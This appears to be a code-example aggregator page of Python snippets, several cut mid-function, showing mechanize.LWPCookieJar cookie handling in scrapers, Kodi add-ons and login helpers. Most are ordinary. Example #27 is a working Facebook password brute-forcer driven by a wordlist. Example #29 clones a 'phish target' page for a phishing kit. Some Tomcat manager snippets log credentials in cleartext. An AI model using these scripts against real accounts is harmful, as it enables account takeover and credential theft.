def browseToManager(url, user, password):
    logger.debug('Browsing to "%s"... Creds: %s:%s' % (url, user, password))
    browser = mechanize.Browser()
    cookiejar = mechanize.LWPCookieJar()
    browser.set_cookiejar(cookiejar)
    browser.set_handle_robots(False)
    browser.add_password(url, user, password)

    error = None
    retry = False
    page = None
    try:
        page = browser.open(url)
    except urllib2.URLError, e:
        error = str(e)
        try:
            logger.debug('Failed with /manager/ trying with /manager/html')
            page = browser.open(url + 'html')
            logger.debug('Succeeded, most likely dealing with Tomcat6.')
            error = None
            url += 'html'
        except urllib2.URLError, e:
            if '403' in str(e):
                logger.debug('Got 403, most likely dealing with Tomcat6.')
                logger.error('Invalid credentials supplied for Apache Tomcat.')
                pass
            else:
                error = str(e)
    def __callRequest(self):
        cookieJar = mechanize.LWPCookieJar()
        try:  # TODO: maybe without the try
            cookieJar.load(self._cookiePath, self.__bIgnoreDiscard, self.__bIgnoreExpired)
        except Exception as e:
            logger.info(e)
        sParameters = urllib.urlencode(self.__aParameters)

        opener = mechanize.build_opener(SmartRedirectHandler,
                                        mechanize.HTTPEquivProcessor,
                                        mechanize.HTTPRefreshProcessor)
        if (len(sParameters) > 0):
            oRequest = mechanize.Request(self.__sUrl, sParameters)
        else:
            oRequest = mechanize.Request(self.__sUrl)

        for aHeader in self.__aHeaderEntries:
            for sHeaderKey, sHeaderValue in aHeader.items():
                oRequest.add_header(sHeaderKey, sHeaderValue)
        cookieJar.add_cookie_header(oRequest)
        
        if self.caching and self.cacheTime > 0:
            sContent = self.readCache(self.getRequestUri())
            if sContent:
                return sContent
        try:
            oResponse = opener.open(oRequest,timeout = 60)             
        except mechanize.HTTPError, e:
            if not self.ignoreErrors:
                xbmcgui.Dialog().ok('xStream','Fehler beim Abrufen der Url:',self.__sUrl, str(e))
                logger.error("HTTPError "+str(e)+" Url: "+self.__sUrl)
                return ''
            else:
                oResponse = e                 
Example #3
 def get_browser(self):
     if self.browser:
         return self.browser
     else:
         browser = mechanize.Browser()
         browser.set_handle_equiv(False)
         browser.set_handle_gzip(True)
         browser.set_handle_redirect(True)
         browser.set_handle_robots(False)
         browser.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(),
                                    max_time=1)
         # browser.set_seekable_responses(False)
         if self.debug:
             browser.set_debug_http(True)
             browser.set_debug_redirects(True)
             browser.set_debug_responses(True)
         cj = mechanize.LWPCookieJar()
         try:
             cj.load(self.cookie_file,
                     ignore_discard=True,
                     ignore_expires=True)
         except IOError:
             pass
         browser.set_cookiejar(cj)
         browser.addheaders = [
             ('User-agent', self.user_agent),
         ]
         self.browser = browser
         return self.browser
Example #4
def init_browser():

    browser = mechanize.Browser()
    cookiejar = mechanize.LWPCookieJar()
    browser.set_cookiejar(cookiejar)
    browser.set_handle_robots(False)

    manager_url = "%s/manager/html" % URL

    browser.add_password(manager_url, USERNAME, PASSWORD)
    try:
        page = browser.open(manager_url)
    except:
        print("[-] Apache Tomcat not found")
        os._exit(0)

    data = page.read()
    m = re.search('Apache Tomcat/([^<]+)', data)

    # avoid a NameError when the version banner is missing
    tomcatVersion = m.group(1) if m else None

    if not tomcatVersion:
        print("[-] Apache Tomcat not found")
        return False

    #print('[+] Apache Tomcat/%s' % (tomcatVersion))
    return browser
Example #5
    def __init__(self, usuario, senha):

        self.usuario = usuario
        self.senha = senha
        self.br = mechanize.Browser()
        # ignore_discard/ignore_expires are arguments to load()/save(), not the constructor
        cookiejar = mechanize.LWPCookieJar("cookies.yml")
        self.br.set_cookiejar(cookiejar)
        ##### Browser options #######
        self.br.set_handle_equiv(False)
        self.br.set_handle_gzip(False)
        self.br.set_handle_redirect(True)
        self.br.set_handle_referer(False)
        self.br.set_handle_robots(False)
        self.br.set_handle_refresh(
            False)  #mechanize._http.HTTPRefreshProcessor(), max_time=1)
        self.br.set_debug_http(True)
        #self.br.set_debug_redirects(True)
        self.br.set_debug_responses(True)
        ########----------###########
        self.br.addheaders = [
            ('User-agent',
             'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1'
             ),
            ('Cache-Control',
             'no-store, no-cache, must-revalidate, post-check=0, pre-check=0'),
            ('Pragma', 'no-cache')
        ]
        #TODO: find a better way to handle the tag registration process
        self.dic_temp = {
        }  # needed to store information for registering tags
def browseToManager(host, url, user, password):
    error = None
    retry = False
    page = None
    tomcatVersion = None

    baseurl = constructBaseUrl(host, url)
    managerurl = ''

    tomcat_suffixes = ['', 'manager', 'manager/html']
    reached = False

    logger.debug('Browsing to "%s"... Creds: "%s:%s"' %
                 (baseurl, user, password))
    browser = mechanize.Browser()
    cookiejar = mechanize.LWPCookieJar()
    browser.set_cookiejar(cookiejar)
    browser.set_handle_robots(False)
    once = True

    for suffix in tomcat_suffixes:
        try:
            managerurl = os.path.join(baseurl, suffix)
            logger.debug('Trying to fetch: "%s"' % managerurl)
            browser.add_password(managerurl, user, password)
            page = browser.open(managerurl)

            data = page.read()
            m = re.search('Apache Tomcat/([^<]+)', data)
            if m:
                logger.debug('Probably found something: Apache Tomcat/%s' %
                             m.group(1))
                tomcatVersion = m.group(1)

            if validateManagerApplication(browser) and tomcatVersion:
                logger.debug(
                    'Apache Tomcat/%s Manager Application reached & validated.'
                    % (tomcatVersion))
                reached = True
                break

        except urllib2.URLError, e:
            error = str(e)
            if 'Connection refused' in error:
                logger.warning(
                    'Could not connect with "%s", connection refused.' %
                    managerurl)
            elif 'Error 401' in error or '403' in error:
                logger.warning(
                    'Invalid credentials supplied for Apache Tomcat.')
                return 403, 403
            elif once:
                once = False
                logger.warning('Browsing to the manager (%s) failed: \n\t%s' %
                               (baseurl, e))
                if ':' not in baseurl[baseurl.find('://') + 3:]:
                    logger.warning(
                        'Did you forget to specify the service port in the host argument (host:port)?'
                    )
Example #7
def themain():
    #browser=mechanize.Browser()
    #browser.open('http://www.baidu.com')
    cj = mechanize.LWPCookieJar()
    opener = mechanize.build_opener(mechanize.HTTPCookieProcessor(cj))
    mechanize.install_opener(opener)
    r = mechanize.urlopen('http://www.baidu.com')
    cj.save('cookie.txt', ignore_discard=True, ignore_expires=True)
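# Companion sketch (not part of the original example): reloading the cookies
# that themain() saved to cookie.txt into a fresh LWPCookieJar so a later
# request reuses the session. The file name is taken from the call above.
import mechanize

def reload_cookies():
    cj = mechanize.LWPCookieJar()
    cj.load('cookie.txt', ignore_discard=True, ignore_expires=True)
    opener = mechanize.build_opener(mechanize.HTTPCookieProcessor(cj))
    mechanize.install_opener(opener)
    return mechanize.urlopen('http://www.baidu.com')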
    def setCookie(self, oCookie):
        cookieJar = mechanize.LWPCookieJar()
        try:  # TODO: maybe without the try
            cookieJar.load(self._cookiePath, self.__bIgnoreDiscard, self.__bIgnoreExpired)
        except Exception as e:
            logger.info(e)

        cookieJar.set_cookie(oCookie)

        cookieJar.save(self._cookiePath, self.__bIgnoreDiscard, self.__bIgnoreExpired)
 def export_cookies(self, req, fp, code, msg, headers):
     oRequest = cRequestHandler('dummy')
     resp = mechanize._response.closeable_response(fp, headers, req.get_full_url(), code, msg)
     cookieJar = mechanize.LWPCookieJar()
     try:
         cookieJar.load(oRequest._cookiePath)
     except Exception as e:
         logger.info(e)            
     cookieJar.extract_cookies(resp,req)  
     cookieJar.save(oRequest._cookiePath)
Example #10
def main():
    """ Program's entry point """
    try:
        web = None
        if len(sys.argv) < 4:
            print "Usage: " + sys.argv[0] + " code.ext out.xml website/problem"
            print
            print "ext = c | cpp | cc | java"
            print "website = livearchive | uva | tju | timus | spoj"
            print
            write_status('Too few arguments to valodator.py')
            sys.exit(1)

        with open(sys.argv[1]) as fcode:
            code = fcode.read()
        url = sys.argv[3]

        website, problem = recognize_problem(url)
        website = website.lower()
        language = recognize_language(sys.argv[1])

        cjar = mechanize.LWPCookieJar()
        if os.access(COOKIE_FILE, os.F_OK):
            cjar.load(COOKIE_FILE)

        # some weird exception pops up due to server's error,
        # and sometimes we get RetryableException
        for retry in xrange(10):
            try:
                browser = build_browser(cjar)
                print 'Website is ' + website
                web = build_web_judge(website, browser)
                status = web.get_verdict(problem, language, code)
                break
            except (httplib.HTTPException, RetryableException):
                web.cleanup_after_crash()
                stack = format_exception_info()
                print stack
                with open(LOG_FILE, 'a') as flog:
                    flog.write('Exception: ' + stack + '\n')
                if retry == 9:
                    write_status("Error, too many retryables.")
                    sys.exit(1)
                time.sleep(2)

        cjar.save(COOKIE_FILE, ignore_discard=True, ignore_expires=True)
        write_status(status)
    except Exception, exc:  #gotta catch 'em all, for logging purposes
        if web:
            web.cleanup_after_crash()
        stack = format_exception_info()
        print stack
        with open(LOG_FILE, 'a') as flog:
            flog.write('Exception: ' + stack + '\n')
        write_status(str(type(exc)) + " " + str(exc))
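# Hedged sketch (not from the original source): the retry loop in main() can be
# factored into a small helper. httplib/time are stdlib; RetryableException is
# the exception class defined by the original module above, and retry_call is a
# hypothetical name.
import httplib
import time

def retry_call(func, attempts=10, delay=2):
    for attempt in xrange(attempts):
        try:
            return func()
        except (httplib.HTTPException, RetryableException):
            if attempt == attempts - 1:
                raise
            time.sleep(delay)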
Example #11
    def __callRequest(self):
        if self.caching and self.cacheTime > 0:
            sContent = self.readCache(self.getRequestUri())
            if sContent:
                return sContent

        cookieJar = mechanize.LWPCookieJar(filename=self._cookiePath)
        try:  # TODO: maybe without the try
            cookieJar.load(ignore_discard=self.__bIgnoreDiscard,
                           ignore_expires=self.__bIgnoreExpired)
        except Exception as e:
            logger.info(e)

        sParameters = urllib.urlencode(self.__aParameters, True)

        handlers = [
            SmartRedirectHandler, mechanize.HTTPEquivProcessor,
            mechanize.HTTPRefreshProcessor
        ]
        if sys.version_info >= (2, 7, 9) and sys.version_info < (2, 7, 11):
            handlers.append(newHTTPSHandler)
        opener = mechanize.build_opener(*handlers)
        if (len(sParameters) > 0):
            oRequest = mechanize.Request(self.__sUrl, sParameters)
        else:
            oRequest = mechanize.Request(self.__sUrl)

        for key, value in self.__headerEntries.items():
            oRequest.add_header(key, value)
        cookieJar.add_cookie_header(oRequest)

        user_agent = self.__headerEntries.get(
            'User-Agent',
            'Mozilla/5.0 (Windows; U; Windows NT 5.1; de-DE; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3'
        )

        try:
            oResponse = opener.open(oRequest, timeout=self.requestTimeout)
        except mechanize.HTTPError, e:
            if e.code == 503 and e.headers.get("Server") == 'cloudflare-nginx':
                html = e.read()
                oResponse = self.__check_protection(html, user_agent,
                                                    cookieJar)
                if not oResponse:
                    logger.error("Failed to get CF-Cookie for Url: " +
                                 self.__sUrl)
                    return ''
            elif not self.ignoreErrors:
                xbmcgui.Dialog().ok('xStream', 'Fehler beim Abrufen der Url:',
                                    self.__sUrl, str(e))
                logger.error("HTTPError " + str(e) + " Url: " + self.__sUrl)
                return ''
            else:
                oResponse = e
Example #12
 def __init__(self):
     self._br = mechanize.Browser()
     self._cj = mechanize.LWPCookieJar()
     csrftoken = makeCsrf()
     self._cj.set_cookie(csrfCookie(csrftoken))
     self._br.set_handle_robots(False)
     self._br.set_cookiejar(self._cj)
     self._br.addheaders.append(('X-CSRFToken',csrftoken))
     self._br.addheaders.append(('Referer',base_url))
     self._logged_in = False
     self._fd = FileDownloader(config.YDL_PARAMS)
     self._fd.add_info_extractor(YoutubeIE())
    def getCookie(self, sCookieName):
        cookieJar = mechanize.LWPCookieJar()
        try:  # TODO: maybe without the try
            cookieJar.load(self._cookiePath, self.__bIgnoreDiscard, self.__bIgnoreExpired)
        except Exception as e:
            logger.info(e)

        for entry in cookieJar:
            if entry.name == sCookieName:
                return entry

        return False
Example #14
    def __init__(self, usid):
        self.usid = usid
        self.baseUrl = "http://userstyles.org"
        self.editUrl = self.baseUrl + "/styles/%d/edit" % usid

        self.cj = mechanize.LWPCookieJar()
        self.br = mechanize.Browser()
        self.br.set_cookiejar(self.cj)

        if os.path.exists(".userstylecookies.txt"):
            self.cj.load(".userstylecookies.txt",
                         ignore_discard=True,
                         ignore_expires=True)
Example #15
    def __init__(self, config):
        """Set up JARFILE and other housekeeping"""
        self.cookiejar = mechanize.LWPCookieJar()
        browser = self.mechanize = mechanize.Browser()
        browser.set_cookiejar(self.cookiejar)
        self.config = config

        # I guess we'll assume good until we get evidence otherwise...
        if JARFILE.exists():
            logging.debug("Loading jarfile: %s", str(JARFILE))
            self.cookiejar.load(JARFILE)
            browser.set_cookiejar(self.cookiejar)
        else:
            self.login()
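    # Hedged companion sketch (not in the original class): after login() the
    # jar should be written back so the next run can take the "load" branch
    # above. The method name save_session is hypothetical.
    def save_session(self):
        logging.debug("Saving jarfile: %s", str(JARFILE))
        self.cookiejar.save(str(JARFILE))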
Example #16
 def __init__(self):
     self.cj = mechanize.LWPCookieJar()
     opener = mechanize.build_opener(mechanize.HTTPCookieProcessor(self.cj))
     mechanize.install_opener(opener)
     self.br = mechanize.Browser()
     self.br.set_cookiejar(self.cj)
     self.sessionkey = 'None'
     self.br.set_header(
         'User-Agent',
         value=
         'Mozilla/5.0 (X11; Linux x86_64; rv:73.0) Gecko/20100101 Firefox/73.0'
     )
     # self.br.set_debug_http(True)
     self.br.set_debug_redirects(True)
Example #17
def setupBrowser():
    """
        Setup the browser which we use for login to facebook and scraping the source code
    """
    br = mechanize.Browser()
    cj = mechanize.LWPCookieJar()
    br.set_cookiejar(cj)
    br.set_handle_equiv(True)
    br.set_handle_redirect(True)
    br.set_handle_referer(True)
    br.set_handle_robots(False)
    br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1)
    br.addheaders = [
        ('User-agent',
         'Mozilla/5.0 (X11; Linux i586; rv:31.0) Gecko/20100101 Firefox/31.0')
    ]
    return br
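# Usage sketch (an assumption, not part of the original): pair setupBrowser()
# with a persistent LWPCookieJar so the scraped session survives between runs.
# The wrapper name and the file fb_cookies.txt are hypothetical.
import mechanize

def setupBrowserWithCookies(cookie_file='fb_cookies.txt'):
    br = setupBrowser()
    cj = mechanize.LWPCookieJar()
    try:
        cj.load(cookie_file, ignore_discard=True, ignore_expires=True)
    except IOError:
        pass  # no saved cookies yet
    br.set_cookiejar(cj)
    return br, cj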
Example #18
def get_trash_zone(address, zip):
    #Make cookie jar.  See wwwsearch.sourceforge.dat/mechanize/hints.html
    cj = mechanize.LWPCookieJar()
    opener = mechanize.build_opener(mechanize.HTTPCookieProcessor(cj))
    mechanize.install_opener(opener)

    #Save cookies
    cj.save(
        "/usr/local/django/recyclocity/recyclocity_static/cookies/cookie_jar",
        ignore_discard=True,
        ignore_expires=True)

    #Create a browser
    browser = mechanize.Browser()

    #Fill in form
    browser.open('http://lmt-web.lowermerion.org/cgi-bin/refuse2.plx')
    browser.form = list(browser.forms())[0]
    browser.form['askrecycle'] = address
    browser.form['postcode'] = zip

    #Submit form
    browser.submit()

    #Extract content
    content = browser.response().read()

    #Use pattern match to extract fields
    m = re.search('<b>(Monday|Tuesday|Wednesday|Thursday|Friday)</b>', content)
    if m:
        day, = m.groups()
        #Convert day to number
        day_number = schedule_helpers.get_day_number(day)
    else:
        #Failed
        return

    m = re.search('<b>Zone ([1-4])</b>', content)
    if m:
        zone, = m.groups()
    else:
        #Failed
        return

    #Match for both day and zone
    return day_number, zone
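# Usage sketch (the address and ZIP below are made-up placeholders): the
# function returns (day_number, zone) on success and None when the scrape
# fails, so unpack defensively.
result = get_trash_zone('123 Main Street', '19003')
if result:
    day_number, zone = result
    print 'Collection day %s, zone %s' % (day_number, zone)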
Example #19
def loginAccount(email: str, password: str):
    br = getNewBrowser()
    # TODO: Fix loadCookies handling
    cookies = mechanize.LWPCookieJar(getCookiesPath())
    if email is None or password is None:
        print("Kein Zugangsdaten vorhanden...")
        return False, br
    elif cookies is not None and os.path.exists(getCookiesPath()):
        # Try to login via stored cookies first - Aral only allows one active session which means we will most likely have to perform a full login
        print('Login aral-supercard.de Account | ' + email)
        print('Versuche Login ueber zuvor gespeicherte Cookies ...')
        br.set_cookiejar(cookies)
    response = br.open(getBaseDomain())
    html = getHTML(response)
    logged_in = isLoggedIN(html)
    if not logged_in:
        if cookies is not None and os.path.exists(getCookiesPath()):
            print('Login ueber Cookies fehlgeschlagen --> Versuche vollstaendigen Login')
        else:
            print('Login aral-supercard.de Account | ' + email)
        br.open(getBaseDomain() + '/login')
        form_index = getFormIndexBySubmitKey(br, 'email')
        if form_index == -1:
            print('Login-Form konnte nicht gefunden werden')
            return False, br
        br.select_form(nr=form_index)
        br['email'] = email
        br['password'] = password
        response = br.submit()
        html = getHTML(response)
        if not isLoggedIN(html):
            print(
                'Login fehlgeschlagen - Ungueltige Zugangsdaten? Korrigiere deine eingetragenen Zugangsdaten in der Datei %s bevor du dieses Script wieder startest!' % getSettingsPath())
            return False, br
        print('Vollstaendiger Login erfolgreich')
        logged_in = True
    cookies = br._ua_handlers['_cookies'].cookiejar

    if cookies is not None:
        # Save cookies and logindata
        print('Speichere Cookies in ' + getCookiesPath())
        cookies.save()
    else:
        print('Keine Cookies zum Speichern vorhanden')
    return logged_in, br
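# Usage sketch (the credentials are placeholders and the '/account' path is an
# assumption): log in cookie-first, falling back to a full login only when the
# stored session is no longer valid.
logged_in, br = loginAccount('user@example.com', 'changeme')
if logged_in:
    response = br.open(getBaseDomain() + '/account')
    print(response.geturl())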
Example #20
    def __callRequest(self):
        cookieJar = mechanize.LWPCookieJar()
        try:  # TODO: maybe without the try
            cookieJar.load(self._cookiePath, self.__bIgnoreDiscard,
                           self.__bIgnoreExpired)
        except Exception as e:
            logger.info(e)

        sParameters = urllib.urlencode(self.__aParameters, True)

        handlers = [
            SmartRedirectHandler, mechanize.HTTPEquivProcessor,
            mechanize.HTTPRefreshProcessor
        ]
        if sys.version_info >= (2, 7, 9) and sys.version_info < (2, 7, 11):
            handlers.append(newHTTPSHandler)
        opener = mechanize.build_opener(*handlers)
        if (len(sParameters) > 0):
            oRequest = mechanize.Request(self.__sUrl, sParameters)
        else:
            oRequest = mechanize.Request(self.__sUrl)

        for key, value in self.__headerEntries.items():
            oRequest.add_header(key, value)
        cookieJar.add_cookie_header(oRequest)

        if self.caching and self.cacheTime > 0:
            sContent = self.readCache(self.getRequestUri())
            if sContent:
                return sContent

        try:
            oResponse = opener.open(oRequest, timeout=self.requestTimeout)
        except mechanize.HTTPError, e:
            if e.code == 503 and e.headers.get("Server") == 'cloudflare-nginx':
                oResponse, cookieJar = cCFScrape().resolve(
                    oRequest, e, cookieJar)
            elif not self.ignoreErrors:
                xbmcgui.Dialog().ok('xStream', 'Fehler beim Abrufen der Url:',
                                    self.__sUrl, str(e))
                logger.error("HTTPError " + str(e) + " Url: " + self.__sUrl)
                return ''
            else:
                oResponse = e
Example #21
def get_trash_zone(address, zip):

    #Make cookie jar.  See wwwsearch.sourceforge.dat/mechanize/hints.html
    cj = mechanize.LWPCookieJar()
    opener = mechanize.build_opener(mechanize.HTTPCookieProcessor(cj))
    mechanize.install_opener(opener)

    #Create a browser
    browser = mechanize.Browser()

    #User-Agent (this is cheating, ok?)
    browser.addheaders = [(
        'User-agent',
        'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1'
    )]

    #Save cookies
    cj.save(
        "/usr/local/django/recyclocity/recyclocity_static/cookies/cookie_jar",
        ignore_discard=True,
        ignore_expires=True)

    #Fill in form
    #browser.open('http://citymaps.phila.gov/portal/')
    #browser.select_form(name="form1")
    #browser.form['txtSearchAddress'] = address

    #Fill in form
    #browser.open('https://alpha.phila.gov/property/')
    #browser.open('http://www.lowermerion.org/cgi-bin/recycle2.plx/')
    browser.open(
        'http://www.lowermerion.org/services/public-works-department/refuse-and-recycling/how-to-determine-your-recycling-collection-day'
    )
    #browser.form = list(browser.forms())[0]
    #browser.form['askrecycle'] = address
    #browser.form['postcode'] = zip

    #Submit form
    #browser.submit()

    #Extract content
    content = browser.response().read()

    return content
 def __init__(self, num, keyword):
     self.num = num
     self.keyword = keyword
     self.br = Browser(factory=mechanize.RobustFactory())
     self.br.set_handle_robots(False)
     self.br.addheaders = [
         ('User-Agent', userAgent),
         ('Accept',
          'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8')
     ]
     self.cj = mechanize.LWPCookieJar()
     self.br.set_cookiejar(self.cj)
     self.br._factory.is_html = True
     self.br.set_handle_refresh(False)
     self.idletime = 0
     threading.Thread.__init__(self)
     self.url = ""
     self.depth = 0
     self.output = ""
Example #23
def browseToManager(url, user, password):
    logger.debug('Browsing to "%s"... Creds: %s:%s' % (url, user, password))
    browser = mechanize.Browser()
    cookiejar = mechanize.LWPCookieJar()
    browser.set_cookiejar(cookiejar)
    browser.set_handle_robots(False)
    browser.add_password(url, user, password)

    try:
        page = browser.open(url)
    except urllib2.URLError, e:
        if 'Connection refused' in str(e):
            logger.error('Could not connect with "%s", connection refused.' % url)
        elif 'Error 404' in str(e):
            logger.error('Server returned 404 Not Found on specified URL: %s' % url)
        elif 'Error 401' in str(e):
            logger.error('Invalid credentials supplied for Apache Tomcat.')
        else:
            logger.error('Browsing to the server (%s) failed: %s' % (url, e))
        return None
Example #24
    def setup_browser(self):
        # initiate browser connection
        br = mechanize.Browser()
        cj = mechanize.LWPCookieJar()
        br.set_cookiejar(cj)

        # Browser options
        br.set_handle_equiv(True)
        br.set_handle_gzip(True)
        br.set_handle_redirect(True)
        br.set_handle_referer(True)
        br.set_handle_robots(False)
        br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(),
                              max_time=1)
        br.addheaders = [('User-agent', 'Chrome')]
        self.br = br

        self.check_login()

        return self
Example #25
    def __init__(self, username, password):
        mechanize.Browser.__init__(self)
        cj = mechanize.LWPCookieJar()
        self.set_cookiejar(cj)
        self.set_handle_equiv(True)
        self.set_handle_redirect(True)
        self.set_handle_referer(True)
        self.set_handle_robots(False)
        self.addheaders = [(
            'User-agent',
            'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1'
        )]
        self.open(self.base_url)

        self.username = username
        self.password = password
        self.login()

        opener = mechanize.build_opener(mechanize.HTTPCookieProcessor(cj))
        mechanize.install_opener(opener)
Example #26
def login(username,password):
    print "[-] LOGIN"
    print "[+] username : " + username
    print "[+] password : " + password
    # part of this snippet was masked in the source; a plain Browser is assumed here
    br = mechanize.Browser()
    br.set_handle_robots(False)
    br.open("https://m.facebook.com/")
    br.select_form(nr=0)
    br.form['email'] = username
    br.form['pass'] = password
    br.submit()
    print "[-] SUCCESS LOGIN"
    return br
Example #27
def run(email, wordlist, agent, timeout):
	now = time.strftime("%X")
	print (LEGAL_DISCLAIMER)
	print ("\n[*] starting at %s\n" % now)
	url = "https://www.facebook.com/login.php?login_attempt=1"
	regexp = re.compile(re.findall("/(.*)\?", url)[0])
	cj = mechanize.LWPCookieJar()
	br = mechanize.Browser()
	br.set_handle_robots(False)
	br.set_handle_equiv(True)
	br.set_handle_referer(True)
	br.set_handle_redirect(True)
	br.set_handle_refresh(mechanize.HTTPRefreshProcessor(), max_time=1)
	br.set_cookiejar(cj); cj.clear()
	br.addheaders = [('User-agent', agent)]
	br.open(url, timeout=timeout)
	form = br.forms()[0]
	fp = open(wordlist, "rb")
	wordlist = fp.readlines()
	print ("\033[01;34m")
	msg = "target: " + email; logger.info(msg)
	msg = "wordlist: %d password" % len(wordlist); logger.info(msg)
	print ("\033[0m")
	while len(wordlist) != 0:
		password = wordlist.pop(0).strip()
		msg = "trying credential => {0}:{1}".format(email, password); logger.info(msg)
		form["email"] = email
		form["pass"] = password
		response = br.open(form.click(), timeout=timeout)
		_url = response.geturl()
		if not regexp.search(_url) or regexp.pattern not in _url:
			print ("\033[01;32m")
			msg = "valid credential: "; logger.info(msg)
			msg = "email|id: " + email; logger.debug(msg)
			msg = "password: " + password; logger.debug(msg)
			print ("\033[0m")
			raise SystemExit

	msg = "password valid tidak ditemukan di wordlist anda: " + fp.name; logger.critical(msg)
Example #28
    def cookie_jar(self):
        cj = getattr(self, '_cookie_jar', None)

        if cj is None:
            cj = mechanize.LWPCookieJar(Zone.cookie_fname)

            if self.use_cookies:
                try:
                    cj.load()
                except IOError:
                    pass

            def save_cookies():
                if self.use_cookies:
                    Zone.status(self, "Saving cookies to " + Zone.cookie_fname)
                    cj.save()
                    Zone.success(self)

            atexit.register(save_cookies)
            self._cookie_jar = cj

        return cj
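# Hedged usage sketch (not part of the original class): the lazily built jar
# from cookie_jar() plugs straight into a Browser, and the atexit hook above
# persists whatever cookies the session collects. `zone` stands for an instance
# of the surrounding class; cookie_jar is called as a plain method here,
# although the original may expose it as a property.
import mechanize

def open_with_cookies(zone, url):
    br = mechanize.Browser()
    br.set_handle_robots(False)
    br.set_cookiejar(zone.cookie_jar())
    return br.open(url)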
Example #29
# Create a mechanized browser to connect to the phish target and grab the response
browse = mechanize.Browser()
browse.set_handle_robots(False)

# Determine if user agent was set,
# if so then set argument, otherwise it is empty
if args['useragent'] is not None:
    uafile = open(args['useragent'], 'r')
    uaheader = uafile.readline()
    browse.addheaders = [('User-Agent', uaheader)]
    uafile.close()

# if sendcookies option was enabled, then connect,
# grab the cookies, and use them in the second connection
if args['sendcookies'] == 1:
    cookies = mechanize.LWPCookieJar()
    browse.set_cookiejar(cookies)
    browse.open(phishsource)

browse.open(phishsource)
phishpage = browse.response().read()
browse.close()

# Use Beautiful soup to handle the HTML response
soup = BeautifulSoup(phishpage, "lxml")

# If autopwn has been configured, implement functionality
if args['autopwn'] is not None:
    # First perform regex to make sure halfway proper link was submitted
    if re.search('^(http|https)\:\/\/[a-zA-Z0-9]+', args['autopwn']):
        # Build frame for HTML response and store in BeautifulSoup object
Example #30
 def getNewToken(self):
     import mechanize #@UnresolvedImport
     br = mechanize.Browser()
     __addon__ = xbmcaddon.Addon(id='script.facebook.media')
     cookiesPath = os.path.join(xbmc.translatePath(__addon__.getAddonInfo('profile')),'cache','cookies')
     LOG('Cookies will be saved to: ' + cookiesPath)
     cookies = mechanize.LWPCookieJar(cookiesPath)
     if os.path.exists(cookiesPath): cookies.load()
     self.cookieJar = cookies
     opener = mechanize.build_opener(mechanize.HTTPCookieProcessor(cookies))
     mechanize.install_opener(opener)
     br.set_cookiejar(self.cookieJar)
     br._ua_handlers["_cookies"].cookiejar.clear()
     br.set_handle_robots(False)
     agent = 'XBMC/{0} Facebook-Media/{1}'.format(xbmc.getInfoLabel('System.BuildVersion'),self.version)
     LOG('Setting User Agent: {0}'.format(agent))
     br.addheaders = [('User-agent',agent)]
     scope = ''
     if self.scope: scope = '&scope=' + self.scope
     url = 'https://www.facebook.com/dialog/oauth?client_id='+self.client_id+\
           '&redirect_uri='+self.redirect+\
           '&type=user_agent&display=popup'+scope
     LOG(url)
     try:
         res = br.open(url)
         html = res.read()
     except:
         LOG("ERROR: TOKEN PAGE INITIAL READ")
         raise
     
     script = False
     try:
         #check for login form
         br.select_form(nr=0)
         LOG("HTML")
     except:
         self.genericError()
         script = True
         LOG("SCRIPT")
         
     if script:
         #no form, maybe we're logged in and the token is in javascript on the page
         url = res.geturl()
         token = self.extractTokenFromURL(url)
         if not token: token = self.parseTokenFromScript(html)
     else:
         try:
             #fill out the form and submit
             br['email'] = self.login_email
             br['pass'] = self.login_pass
             res = br.submit()
             url = res.geturl()
             LOG("FORM")
         except:
             LOG("FORM ERROR")
             raise
             
         script = False
         token = self.extractTokenFromURL(url)
         html = self.browserRead(res,'-noscript')
         if not token:
             #if 'class="checkpoint"' in html:
             token = self.handleLoginNotificationCrap(br)
             
         if not token: script = True
         
         if script:
             LOG("SCRIPT TOKEN")
             #no token in the url, let's try to parse it from javascript on the page
             try:
                 __addon__ = xbmcaddon.Addon(id='script.facebook.media')
                 htmlFile = os.path.join(xbmc.translatePath(__addon__.getAddonInfo('profile')),'cache','DEBUG_HTML.html')
                 open(htmlFile,'w').write(html)
                 LOG('html output written to: ' + htmlFile)
             except:
                 pass
             token = self.parseTokenFromScript(html)
             token = urllib.unquote(token.decode('unicode-escape'))
     
     if not self.tokenIsValid(token):
         #if script: LOG("HTML:" + html)
         return False
     LOG("\n|--------------------\n|TOKEN: %s\n|--------------------"  % token)
     self.saveToken(token)
     if self.cookieJar is not None:
         self.cookieJar.save()
     return token
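# Hedged sketch of the token extraction referenced above (the original
# extractTokenFromURL implementation is not shown in this example): Facebook's
# implicit OAuth flow puts access_token=...&expires_in=... in the redirect URL
# fragment, so a plausible standalone version just parses that fragment.
import urlparse

def extract_token_from_url(url):
    params = urlparse.parse_qs(urlparse.urlparse(url).fragment)
    return params.get('access_token', [None])[0]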